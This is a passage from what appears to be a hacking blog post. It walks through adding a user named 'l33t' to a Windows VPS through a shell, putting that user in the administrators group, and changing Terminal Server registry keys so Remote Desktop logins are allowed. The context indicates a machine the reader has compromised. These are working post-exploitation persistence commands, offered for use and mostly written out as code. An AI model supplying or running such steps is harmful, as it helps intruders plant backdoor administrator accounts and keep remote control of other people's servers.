Code:
net user l33t p4$sword /add
After execution the shell will give you a result like this :
Code:
The command completed successfully.
The user has been added with success now we need to add it on administrators group.
Attention: If the VPS Has an your unknown Language use google translate ( AutoDetect ).
Now to add administrator access to your user >
Code:
net localgroup administrators l33t /add
After execution connect to the VPS
If the VPS Have an static ip but doesn’t connect on (mstsc) use these commands to allow remote users :
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
credits to Ninja
0 nhận xét:
Post a Comment